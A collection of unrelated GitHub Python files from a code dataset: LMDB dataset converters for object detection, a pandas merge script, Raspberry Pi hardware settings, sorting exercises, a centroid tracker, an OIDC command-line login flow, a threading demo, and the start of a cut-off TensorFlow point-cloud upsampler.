lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n anno_file=data_dir+\"/brainwash_\"+args.split+\".idl\"\n with open(anno_file) as f:\n lines = f.readlines()\n for line in tqdm(lines):\n items = line[:-1].split(\":\")\n if len(items)==2:\n imgpath = items[0][1:-1]\n imgname = imgpath.split(\"/\")[-1]\n img = cv2.imread(data_dir+\"/\"+imgpath)\n if img is None:\n print(imgpath+\" cannot read\")\n continue\n items = items[1][1:-1].replace(\",\",\"\")\n items = items.replace(\"(\",\"\")\n items = items.replace(\")\",\"\")\n items = items.split(\" \")\n items = [int(float(b)) for b in items]\n bboxes = []\n for i in range(int(len(items)/4)):\n x = items[4*i]\n y = items[4*i+1]\n x2 = items[4*i+2]\n y2 = items[4*i+3]\n bboxes.append([x,y,x2,y2,0])\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imgname,annotated_datum.SerializeToString())\n\n#for coco with json annotation dataset\ndef convertjson(txn,json_path):\n with open(json_path) as f:\n samples = json.load(f)\n images_dir = os.path.dirname(json_path)+\"/../images\"\n for sample in tqdm(samples):\n imagename = sample[\"file_name\"]\n imgpath = images_dir+\"/\"+imagename\n img = cv2.imread(imgpath)\n h,w,_ = img.shape\n if img is None:\n print(imagename + \"Not found\")\n continue\n bboxes = []\n objs = sample[\"object\"]\n for obj in objs:\n bbox = obj['bbox']\n bbox[0] = bbox[0]\n bbox[1] = bbox[1]\n bbox[2] = bbox[0]+bbox[2]\n bbox[3] = bbox[1]+bbox[3]\n bbox.append(0)\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imagename.encode(),annotated_datum.SerializeToString())\ndef coco2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n json_path = \"data/\"+args.dataset+\"/annotations/instances_\"+args.split+\".json\"\n convertjson(txn,json_path)\n\ndef freihand2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n anno_file=data_dir+\"/annotations/freihand_\"+args.split+\".json\"\n with open(anno_file) as f:\n data = json.load(f)\n for anno in tqdm(data['annotations']):\n filename = \"{:08d}\".format(anno['image_id'])+\".jpg\"\n img = cv2.imread(data_dir+\"/training/rgb/\"+filename)\n if img is None:\n print(filename+\"not found\")\n continue\n bboxes = []\n bbox = anno['bbox']\n bbox[2] += bbox[0]\n bbox[3] += bbox[1]\n bbox.append(0)\n bboxes.append(bbox)\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename,annotated_datum.SerializeToString())\n#for bdd100k\n# data/Car\n# --images\n# --labels\n# --train.txt\n# --val.txt\n# each line contain imgpath like 100k/train/61c0de9c-996cae66.jpg\ndef bdd2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n valfile = data_dir+\"/\"+args.split+\".txt\"\n with open(valfile) as f:\n lines = f.readlines()\n for line in tqdm(lines):\n imgpath = data_dir+\"/images/\"+line.strip()\n img = cv2.imread(imgpath)\n annopath = data_dir+\"/labels/\"+line[:-4]+\"json\"\n with open(annopath) as fanno:\n data = json.load(fanno)\n objs = data['frames'][0]['objects']\n bboxes = []\n for obj in objs:\n label = obj['category']\n if 'box2d' in obj and label == \"car\": \n bbox = obj['box2d']\n x1 = float(bbox['x1'])\n y1 = float(bbox['y1'])\n x2 = float(bbox['x2'])\n y2 = float(bbox['y2'])\n bboxes.append([x1,y1,x2,y2,0]) \n if len(bboxes) == 0:\n print(imgpath + \" has no valid size \")\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imgpath,annotated_datum.SerializeToString()) \n#for widerface\n# data/Face\n# --WIDER_train\n# --WIDER_val\n# --wider_face_split\n# --wider_face_train_bbx_gt.txt\n# --wider_face_val_bbx_gt.txt\ndef wider2lmdb(args, min_size = 30):\n import sys\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir, map_size=1e10)\n with db.begin(write=True) as txn:\n annopath = data_dir+\"/wider_face_split/wider_face_\"+args.split+\"_bbx_gt.txt\"\n imgdir = data_dir+\"/WIDER_\"+args.split+\"/images\"\n with open(annopath) as f:\n while(True):\n imgpath = f.readline()[:-1]\n sys.stdout.write(\"\\r\"+imgpath)\n if imgpath == \"\":\n break\n img = cv2.imread(imgdir+\"/\"+imgpath)\n numbbox=int(f.readline())\n bboxes = []\n for _ in range(numbbox):\n line = f.readline()\n line = line.split()\n line = [int(l) for l in line]\n size = max(line[2],line[3])\n bbox = line[:4]\n bbox[2] += bbox[0]\n bbox[3] += bbox[1]\n bbox.append(0)\n if size <= min_size:\n continue\n bboxes.append(bbox)\n if len(bboxes) == 0:\n print(imgpath + \" has no valid size \")\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imgpath.encode(),annotated_datum.SerializeToString())\n\ndef mask2lmdb(args, min_size = 20):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n dir = data_dir+'/'+args.split\n files = os.listdir(dir)\n files = [ f for f in files if f.endswith('.xml')]\n if args.split.find(\"train\"):\n files = random.shuffle(files)\n cat2label = {cat: i for i, cat in enumerate(CLASSES[args.dataset])}\n for file in tqdm(files):\n xml_path = dir+'/'+file\n tree = ET.parse(xml_path)\n root = tree.getroot()\n filename = file.replace('xml','jpg')\n imgpath = dir+'/'+filename\n img = cv2.imread(imgpath)\n if img is None:\n print(\"cannot read \"+imgpath)\n continue\n bboxes = []\n for obj in root.findall('object'):\n name = obj.find('name').text\n if name not in CLASSES[args.dataset]:\n print(imgpath+\" has no expect label \"+name)\n continue\n label = cat2label[name]\n bbox = obj.find('bndbox')\n x = float(bbox.find('xmin').text)\n y = float(bbox.find('ymin').text)\n x2 = float(bbox.find('xmax').text)\n y2 = float(bbox.find('ymax').text)\n bbox = [x,y,x2,y2,label]\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename.encode(),annotated_datum.SerializeToString())\n\ndef lmdb2image(args, show=False, gen_anchors=True,normalized=True):\n data_dir =\"data/\"+args.dataset\n lmdb_dir = data_dir+\"/lmdb/\"+args.split+\"_lmdb\"\n if not os.path.exists(lmdb_dir):\n print(lmdb_dir+\" not exists\")\n return\n db = lmdb.open(lmdb_dir)\n txn = db.begin()\n cursor = txn.cursor()\n annotated_datum = caffe_pb2.AnnotatedDatum()\n if gen_anchors:\n data = []\n labels = CLASSES[args.dataset]\n statics = len(labels)*[0]\n index = 0\n num_images = txn.stat()['entries']\n pbar = tqdm(range(num_images))\n for key, value in cursor:\n pbar.set_description(\"{}/{}\".format(index,num_images))\n pbar.update(1)\n index += 1\n annotated_datum.ParseFromString(value)\n groups = annotated_datum.annotation_group\n #print(len(groups))\n if show or not normalized:\n datum = annotated_datum.datum\n img = np.fromstring(datum.data,dtype=np.uint8)\n img = cv2.imdecode(img,-1) \n height, width, _ = img.shape\n for group in groups:\n for annotation in group.annotation:\n bbox = annotation.bbox\n if bbox.xmax-bbox.xmin<=0 or bbox.ymax-bbox.ymin<=0:\n continue\n labelindex = group.group_label-1\n label = labels[labelindex]+\"_\"+str(annotation.instance_id)\n statics[labelindex] += 1\n if show or not normalized:\n x1 = int(bbox.xmin*width)\n y1 = int(bbox.ymin*height)\n x2 = int(bbox.xmax*width)\n y2 = int(bbox.ymax*height)\n cv2.rectangle(img,(x1,y1),(x2,y2),(255,0,0))\n cv2.putText(img,label,(x1,y1),3,1,(0,0,255))\n if gen_anchors:\n if normalized:\n data.append([bbox.xmax-bbox.xmin,bbox.ymax-bbox.ymin])\n else:\n data.append([x2-x1,y2-y1])\n if args.savegt:\n filename=key.decode().replace(\"/\",\"_\")\n cv2.imwrite(\"output/gt/\"+filename,img)\n if show:\n cv2.putText(img,key.decode(),(0,20),3,1,(0,0,255))\n cv2.imshow(\"img\",img)\n cv2.waitKey()\n total = 0\n for i,st in enumerate(statics):\n total += st\n print(labels[i]+\": \"+str(st))\n print(\"-------Total: \"+str(total))\n if gen_anchors:\n from get_anchors import get_anchors\n get_anchors(data)\n\nfuncs = Registry()\nfuncs.register_module(\"voc\",xml2lmdb)\nfuncs.register_module(\"fddb\",xml2lmdb)\nfuncs.register_module(\"wider\",wider2lmdb)\nfuncs.register_module(\"Face\",xml2lmdb)\nfuncs.register_module(\"Mask\",mask2lmdb)\nfuncs.register_module(\"Person\",xml2lmdb)\nfuncs.register_module(\"Head\",idl2lmdb)\nfuncs.register_module(\"Hand\",freihand2lmdb)\nfuncs.register_module(\"Car\",bdd2lmdb)\nfuncs.register_module(\"tower\",txt2lmdb)\nfuncs.register_module(\"insect\",paddle2lmdb)\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default=\"Mask\")\n parser.add_argument('--split', default=\"val\")\n parser.add_argument('--savegt', default=False)\n return parser.parse_args()\n\nif __name__==\"__main__\":\n args = get_args()\n func = funcs.get(args.dataset)\n func(args)\n lmdb2image(args)","repo_name":"imistyrain/ssd-models","sub_path":"python/convert2lmdb.py","file_name":"convert2lmdb.py","file_ext":"py","file_size_in_byte":22498,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"21"} +{"seq_id":"71698703093","text":"import pandas as pd\nimport numpy as np\nimport argparse\n\nimport glob\n\nparser = argparse.ArgumentParser(description=\"Process some data file\")\nparser.add_argument('--fp', type=str, help='Data to be processed')\nparser.add_argument('--sfp', type=str, help='Data to be processed')\nargs = parser.parse_args()\n\nFile_path = args.fp\nStatus_file_path = args.sfp\nall_data = pd.DataFrame()\n\ndef data_comb(File_path,Status_file_path):\n glob.glob(File_path)\n for f in glob.glob(File_path):\n df = pd.read_excel(f)\n all_data = all_data.append(df,ignore_index=True)\n \n all_data['date'] = pd.to_datetime(all_data['date'])\n\n status = pd.read_excel(Status_file_path)\n\n all_data_st = pd.merge(all_data, status, how='left')\n\n all_data_st['status'].fillna('bronze',inplace=True)\n\n all_data_st[\"status\"] = all_data_st[\"status\"].astype(\"category\")\n all_data_st.dtypes\n\n all_data_st.groupby([\"status\"])[\"quantity\",\"unit price\",\"ext price\"].mean()\n\n all_data_st.groupby([\"status\"])[\"quantity\",\"unit price\",\"ext price\"].agg([np.sum,np.mean, np.std])\n\n all_data_st.drop_duplicates(subset=[\"account number\",\"name\"]).ix[:,[0,1,7]].groupby([\"status\"])[\"name\"].count()\n\n print(all_data_st)\n\nif File_path != None and Status_file_path != None:\n data_comb(File_path,Status_file_path)\n\nprint(all_data_st)","repo_name":"shubhamchoubey80/Python-Practice-Problems","sub_path":"Data Combining/comb_file.py","file_name":"comb_file.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4982353923","text":"import time\n\ndef init():\n timestr = time.strftime(\"%Y%m\")\n\n # *** Explorer -> Projector\n # *** Collector -> Camera\n\n # Transfer\n # --------------------------------------------------------------------------\n\n # IP Addresses\n # TODO: change for deployment - determine static IP addrs for the camera and the projector\n global IP_ADDR_PROJECTOR\n # IP_ADDR_PROJECTOR = '192.168.0.127'\n # IP_ADDR_PROJECTOR = '192.168.123.193'\n # IP_ADDR_PROJECTOR = '192.168.1.193'\n IP_ADDR_PROJECTOR = '192.168.0.179'\n\n global IP_ADDR_CAMERA\n # IP_ADDR_CAMERA = '192.168.0.149'\n # IP_ADDR_CAMERA = '192.168.123.100'\n # IP_ADDR_CAMERA = '192.168.1.100'\n IP_ADDR_CAMERA = '192.168.0.110'\n\n # Databases\n # TODO: change for deployment\n global DBNAME_MASTER\n DBNAME_MASTER = \"capra_projector_test_179.db\"\n\n global DBNAME_MASTER_BAK\n DBNAME_MASTER_BAK = \"capra_projector_test_179_\" + timestr + \"_bak.db\"\n\n global DBNAME_INIT\n DBNAME_INIT = \"capra_projector_init.db\"\n\n global DBNAME_CAMERA\n DBNAME_CAMERA = \"capra_camera.db\"\n global DBNAME_CAMERA_BAK\n DBNAME_CAMERA_BAK = \"capra_camera_\" + timestr + \"_bak.db\"\n\n # Paths\n global DATAPATH_CAMERA\n DATAPATH_CAMERA = '/home/pi/capra-storage/'\n\n global DATAPATH_PROJECTOR\n DATAPATH_PROJECTOR = '/media/pi/capra-hd/'\n # DATAPATH_PROJECTOR = '/media/pi/capra-hd3/jordan/'\n\n global CAPRAPATH_PROJECTOR\n CAPRAPATH_PROJECTOR = '/home/pi/capra/'\n\n global PATH_CAMERA_DB\n PATH_CAMERA_DB = DATAPATH_CAMERA + DBNAME_CAMERA\n\n global PATH_PROJECTOR_DB\n PATH_PROJECTOR_DB = DATAPATH_PROJECTOR + DBNAME_MASTER\n\n\n # Regex for picture names\n global FILENAME\n global FILENAME_ROTATED\n FILENAME = \"[!\\.]*_cam[1-3].jpg\"\n FILENAME_ROTATED = \"[!\\.]*_cam2r.jpg\"\n\n # Hall Effect sensor statuses\n global HALL_EFFECT\n global PREV_HALL_VALUE\n HALL_EFFECT = None\n PREV_HALL_VALUE = False\n global HALL_BOUNCE_LIMIT\n global HALL_BOUNCE_TIMER\n HALL_BOUNCE_LIMIT = 3000 # in milliseconds\n HALL_BOUNCE_TIMER = None\n\n # Is camera connected to WiFi? \n global CAMERA_UP\n CAMERA_UP = None\n\n # Flags\n global flag_start_transfer\n flag_start_transfer = False\n\n global flag_run_explorer\n flag_run_explorer = False\n\n # Color detection\n global COLOR_CLUSTER\n COLOR_CLUSTER = 5\n\n global COLOR_DIMX\n COLOR_DIMX = 160\n\n global COLOR_DIMY\n COLOR_DIMY = 95\n\n # Projector\n # --------------------------------------------------------------------------\n\n # Projector Pins\n global PROJ_UART\n PROJ_UART = 14 # BOARD - 8 (used to be RGB1_BLUE)\n\n global HALL_EFFECT_PIN\n HALL_EFFECT_PIN = 26 # BOARD - 37\n global BUTT_MODE\n BUTT_MODE = 20 # BOARD - 38\n global BUTT_PLAY_PAUSE\n BUTT_PLAY_PAUSE = 5 # BOARD - 29\n global BUTT_PREV # Eagle says this is NEXT\n BUTT_PREV = 6 # BOARD - 31\n global BUTT_NEXT # Eagle says this is PREV\n BUTT_NEXT = 13 # BOARD - 33\n global BUTT_OFF\n BUTT_OFF = 4 # BOARD - 7\n global BUTT_ON\n BUTT_ON = 3 # BOARD - 5\n\n global ACCEL\n ACCEL = 0x1d # Accelerometer - change to 0x1e if you have soldered the address jumper\n global ACCEL_SCL\n ACCEL_SCL = 3 # BOARD - 5\n global ACCEL_SDA\n ACCEL_SDA = 2 # BOARD - 3\n\n global BUTT_ENC1\n BUTT_ENC1 = 25 # BOARD - 22\n global ENC1_A\n ENC1_A = 23 # BOARD - 16\n global ENC1_B\n ENC1_B = 24 # BOARD - 18\n\n global NEO1\n NEO1 = 18 # BOARD - 12\n\n global WHITE_LED1\n WHITE_LED1 = 19 # BOARD - 35\n global WHITE_LED2\n WHITE_LED2 = 16 # BOARD - 36\n global WHITE_LED3\n WHITE_LED3 = 21 # BOARD - 40\n\n global RGB1_RED\n RGB1_RED = 15 # BOARD - 10\n global RGB1_GREEN\n RGB1_GREEN = 17 # BOARD - 11\n\n global RGB2_RED\n RGB2_RED = 7 # BOARD - 26\n global RGB2_GREEN\n RGB2_GREEN = 8 # BOARD - 24\n global RGB2_BLUE\n RGB2_BLUE = 11 # BOARD - 23\n\n # Camera\n # --------------------------------------------------------------------------\n\n # Camera Storage\n global DB\n DB = '/home/pi/capra-storage/capra_camera.db'\n\n global DIRECTORY\n DIRECTORY = '/home/pi/capra-storage/'\n\n # Camera Pins\n global BUTTON_PLAYPAUSE\n BUTTON_PLAYPAUSE = 17 # BOARD - 11\n global BUTTON_OFF\n BUTTON_OFF = 25 # BOARD - 22\n global SEL_1\n SEL_1 = 22 # BOARD - 15\n global SEL_2\n SEL_2 = 23 # BOARD - 16\n global LED_RED\n LED_RED = 13 # BOARD - 33\n global LED_GREEN\n LED_GREEN = 26 # BOARD - 37\n global LED_BLUE\n LED_BLUE = 14 # BOARD - 8\n global PIEZO\n PIEZO = 12 # BOARD - 32\n global LDO\n LDO = 6 # BOARD - 31\n\n # Camera Settings\n global SEALEVEL_PRESSURE\n SEALEVEL_PRESSURE = 101500\n global CAM_RESOLUTION\n CAM_RESOLUTION = (1280, 720)\n global NEW_HIKE_TIME\n # NEW_HIKE_TIME = 10800 # 3 hours\n # NEW_HIKE_TIME = 9000 # 2.5 hours\n NEW_HIKE_TIME = 3600 # 1 hour\n global CAM_INTERVAL\n CAM_INTERVAL = 5 # 5 seconds\n","repo_name":"EverydayDesignStudio/capra","sub_path":"globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"27119222036","text":"#a) Создайте два списка в диапазоне (0, 100) с шагом 10. Присвойте некоторым переменным значения этих списков.\n#b) Извлеките из первого списка второй элемент.\n#c) Измените во втором списке последний объект на число «200». Выведите список на экран.\n#d) Соедините оба списка в один, присвоив результат новой переменной.\n#Выведите получившийся список на экран.\n#e) Возьмите срез из соединённого списка так, чтобы туда попали некоторые части обоих первых списков. Срез свяжите с очередной новой переменной. Выведите значение этой переменной.\n#f) Добавьте в список-срез два новых элемента и снова выведите его.\n#g) С помощью функций min() и max() найдите и выведите элементы объединенного списка с максимальным и минимальным значением\nimport random\n\ndef task_a(size):\n list_new = []\n for i in range(size):\n t = random.randint(0, 100)\n list_new.append(t)\n return list_new\n\n\ndef task_b(list_task):\n list_task.pop(1)\n return list_task\n\n\ndef task_c(list_task):\n list_task.pop()\n list_task.append(200)\n return list_task\n\n\ndef task_d(list_task_1, list_task_2):\n list_combined = list_task_1 + list_task_2\n return list_combined\n\n\ndef task_e(list_combined):\n list_cutted = []\n i = 20\n while i < 40:\n list_cutted.append(list_combined[i])\n i += 1\n return list_cutted\n\n\ndef task_f(list_cutted):\n list_cutted.append(10)\n list_cutted.append(30)\n return list_cutted\n\n\ndef main():\n\n #Пункт a)\n list_1 = task_a(30)\n list_2 = task_a(25)\n print(\"Созданные списки:\")\n print(list_1)\n print(list_2)\n print()\n\n #Пункт b)\n list1 = task_b(list_1)\n\n #Пункт c)\n list_2 = task_c(list_2)\n print(\"Видоизменённые списки:\")\n print(list_1)\n print(list_2)\n print()\n\n #Пункт d)\n list_combined = task_d(list_1, list_2)\n print(\"Список после объединения:\")\n print(list_combined)\n print()\n\n #Пункт e)\n list_cutted = task_e(list_combined)\n print(\"Обрезанный список:\")\n print(list_cutted)\n print()\n\n #Пункт f)\n list_cutted = task_f(list_cutted)\n print(\"Обрезанный список после добавления элементов:\")\n print(list_cutted)\n print()\n\n #Пункт g)\n print(f\"Минимальный элемент в списке со срезом: {min(list_cutted)}\")\n print(f\"Максимальный элемент в списке со срезом: {max(list_cutted)}\")\n\n return 0\n\n\nif __name__ == '__main__':\n main()","repo_name":"BlockHead007/pythontasks","sub_path":"Лабораторная 2/Task 2.py","file_name":"Task 2.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41217167535","text":"from bisect import bisect_left\nfrom time import time\n\n\ndef insertion_sort_time(vetor):\n for i in range(1, len(vetor)):\n chave = vetor[i]\n j = bisect_left(vetor, chave, 0, i)\n vetor[j+1:i+1] = vetor[j:i]\n vetor[j] = chave\n return vetor\n\n\ndef bubble_sort_time(vetor):\n n = len(vetor)\n troca = True\n while troca:\n troca = False\n for i in range(n-1):\n if vetor[i] > vetor[i+1]:\n vetor[i], vetor[i+1] = vetor[i+1], vetor[i]\n troca = True\n n -= 1\n return vetor\n\n\ndef bubble_sort_comparacoes(vetor):\n comparacoes, trocas = 0, 0\n n = len(vetor)\n troca = True\n while troca:\n troca = False\n for i in range(n-1):\n comparacoes += 1\n if vetor[i] > vetor[i+1]:\n \n vetor[i], vetor[i+1] = vetor[i+1], vetor[i]\n trocas += 2\n \n troca = True\n n -= 1\n return comparacoes, trocas\n\n\ndef insertion_sort_comparasoes(vetor):\n comparacoes, trocas = 0, 0\n for i in range(1, len(vetor)):\n chave = vetor[i]\n\n j, c = bisect_left2(vetor, chave, 0, i)\n comparacoes += c\n\n trocas += 1\n vetor[j+1:i+1] = vetor[j:i]\n\n trocas += 1\n vetor[j] = chave\n\n return comparacoes, trocas\n\n\ndef bisect_left2(a, x, lo=0, hi=None):\n \"\"\"Return the index where to insert item x in list a, assuming a is sorted.\n\n The return value i is such that all e in a[:i] have e < x, and all e in\n a[i:] have e >= x. So if x already appears in the list, a.insert(i, x) will\n insert just before the leftmost x already there.\n\n Optional args lo (default 0) and hi (default len(a)) bound the\n slice of a to be searched.\n \"\"\"\n comparacoes = 0\n\n\n comparacoes += 1\n if lo < 0:\n raise ValueError('lo must be non-negative')\n comparacoes += 1\n\n if hi is None:\n hi = len(a)\n\n while lo < hi:\n mid = (lo + hi) // 2\n comparacoes += 1\n if a[mid] < x:\n lo = mid + 1\n else:\n hi = mid\n\n return lo, comparacoes\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"djudju12/aulas","sub_path":"fabrica-software/algoritmos-performance/algortimosItem4.py","file_name":"algortimosItem4.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4509182835","text":"from scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\n\n## Centroid tracking algorithm adapted from:\n## https://www.pyimagesearch.com/2018/07/23/simple-object-tracking-with-opencv/\n\nclass Person():\n def __init__(self, centroid, bbox):\n self.bbox = bbox\n self.centroid = centroid\n\nclass Centroid_Tracking():\n def __init__(self):\n self.next_person = 0\n self.people = OrderedDict()\n self.disappeared = OrderedDict()\n\n def get_centroids(self, bbox):\n x_c = (bbox[0] + bbox[2]) / 2\n y_c = (bbox[1] + bbox[3]) / 2\n return [x_c, y_c]\n\n def new_person(self, centroid, bbox):\n person_id = self.next_person\n\n self.people[person_id] = Person(centroid, bbox)\n self.disappeared[person_id] = 0\n \n self.next_person += 1\n\n def tracking_update(self, new_bboxes): \n new_centroids = [self.get_centroids(bbox) for bbox in new_bboxes]\n\n if len(self.people) == 0:\n for i in range(len(new_centroids)):\n self.new_person(new_centroids[i], new_bboxes[i])\n else:\n used_rows = set()\n used_cols = set()\n\n people_ids = list(self.people.keys())\n cur_centroids = [list(self.people.values())[i].centroid for i in range(len(people_ids))]\n distances = dist.cdist(np.array(cur_centroids), np.array(new_centroids))\n\n rows = distances.min(axis=1).argsort()\n cols = distances.argmin(axis=1)[rows]\n \n for (row, col) in zip(rows, cols):\n if row in used_rows or col in used_cols:\n continue\n person_id = people_ids[row]\n self.people[person_id] = Person(new_centroids[col], new_bboxes[col])\n self.disappeared[person_id] = 0\n\n used_rows.add(row)\n used_cols.add(col)\n\n unused_row = set(range(0, distances.shape[0])).difference(used_rows)\n unused_col = set(range(0, distances.shape[1])).difference(used_cols)\n\n if distances.shape[0] >= distances.shape[1]:\n for row in unused_row:\n person_id = people_ids[row]\n self.disappeared[person_id] += 1\n\n else:\n for col in unused_col:\n self.new_person(new_centroids[col], new_bboxes[col])\n \n def tracking_frame(self, new_bboxes):\n if len(new_bboxes) == 0:\n for person_id in list(self.disappeared.keys()):\n self.disappeared[person_id] += 1\n return []\n else:\n # calculate new centroids\n self.tracking_update(new_bboxes)\n people_ids = list(self.people.keys())\n ret_bboxes = []\n for person_id in people_ids:\n if self.disappeared[person_id] == 0:\n bbox = self.people[person_id].bbox\n bbox.append(person_id)\n ret_bboxes.append(bbox)\n\n return ret_bboxes","repo_name":"brandon-l-ut/social_distancing_violation_detector","sub_path":"distance/centroid_tracking.py","file_name":"centroid_tracking.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26983436041","text":"import webbrowser\nfrom urllib import parse as urlparse\nfrom multiprocessing import Process, Queue\nimport json\nimport requests\nimport logging\nfrom logging.config import dictConfig\nimport random\nfrom .. import config, database\nfrom . import _callback\n\nLOGGER = logging.Logger(__name__)\n\nCHARACTERS ='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'\n\n\ndef main(namespace, _):\n credentials = database.Credentials()\n id_token = credentials.get_token(namespace.provider_alias)\n if id_token:\n return id_token\n\n provider = config.provider(namespace.provider_alias)\n auth_request_uri, state = craft_request_uri(provider)\n queue = Queue()\n p = Process(target=_callback_server, args=(provider, state, queue))\n p.start()\n webbrowser.open(auth_request_uri)\n while input():\n pass\n p.terminate()\n code = queue.get()\n id_token = get_id_token(provider, code)\n credentials.save_token(namespace.provider_alias, id_token)\n\n\ndef craft_request_uri(provider):\n endpoint = provider.authorization_endpoint\n random_state = ''.join([random.choice(CHARACTERS) for i in range(16)])\n query = urlparse.urlencode({\n 'response_type': 'code',\n 'client_id': provider.client_id,\n 'redirect_uri': 'http://localhost:9527/code',\n 'state': random_state,\n 'scope': 'openid',\n })\n return f'{endpoint}?{query}', random_state\n\n\ndef _callback_server(provider, state, queue):\n dictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '',\n }},\n 'handlers': {'wsgi': {\n 'class': 'logging.StreamHandler',\n 'stream': _callback.devnull,\n 'formatter': 'default'\n }},\n 'root': {\n 'level': 'INFO',\n 'handlers': ['wsgi']\n },\n })\n _callback.state = state\n _callback.token_endpoint = provider.token_endpoint\n _callback.queue = queue\n _callback.app.run(port=9527)\n\n\ndef get_id_token(provider, code):\n query = {\n 'grant_type': 'authorization_code',\n 'client_id': provider.client_id,\n 'client_secret': provider.client_secret,\n 'code': code,\n 'redirect_uri': 'http://localhost:9527/code',\n }\n response = requests.post(provider.token_endpoint, data=query)\n return json.loads(response.text)['id_token']\n","repo_name":"aisamji/oidc-auth","sub_path":"oidc_auth/commands/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38259321727","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 3 11:17:51 2019\r\n\r\n@author: Tanvir.Duggal\r\n\"\"\"\r\n\r\nimport threading\r\nimport time\r\nimport random\r\n\r\nitems = []\r\nevent = threading.Event()\r\n\r\nclass consumer(threading.Thread):\r\n def __init__(self, items, event):\r\n threading.Thread.__init__(self)\r\n self.items = items\r\n self.event = event\r\n \r\n def run(self):\r\n while True:\r\n time.sleep(2)\r\n self.event.wait()\r\n item = self.items.pop()\r\n print(\"Consumer consumed \" + str(item) + \" , popped from list \" + self.name)\r\n \r\nclass producer(threading.Thread):\r\n def __init__(self, integers, event):\r\n threading.Thread.__init__(self)\r\n self.items = items\r\n self.event = event\r\n \r\n def run(self):\r\n global item\r\n for i in range(10):\r\n time.sleep(2)\r\n item = random.randint(0,256)\r\n self.items.append(item)\r\n print(\"Producer produced \" + str(item) + \" , appended into \" + str(self.name))\r\n self.event.set()\r\n self.event.clear()\r\n \r\n \r\nif __name__ == '__main__':\r\n t1 = consumer(items, event)\r\n t2 = producer(items, event)\r\n\r\n t1.start()\r\n t2.start()\r\n \r\n t1.join()\r\n t2.join()","repo_name":"TanvirDuggal/Parallel-Programming","sub_path":"2_Threading/8_EventThread.py","file_name":"8_EventThread.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4989918202","text":"import tensorflow as tf\n\nfrom PointCloudManage.upsample_op.ops import recurrent_context_encoding, hierarchical_feature_expansion, conv1d\n\nclass Generator(object):\n def __init__(self, cfg, is_training, name=\"Displacement\"):\n self.cfg = cfg\n self.is_training = is_training\n self.name = name\n self.reuse = tf.AUTO_REUSE\n self.num_point = self.cfg.patch_num_points\n self.up_ratio = self.cfg.up_ratio\n self.up_ratio_real = self.up_ratio + self.cfg.more_up\n self.out_num_point = int(self.num_point*self.up_ratio)\n\n def __call__(self, inputs):\n use_bn = False\n use_ibn = False\n\n with tf.variable_scope(self.name, reuse=self.reuse):\n # inputs = gather_point(inputs, 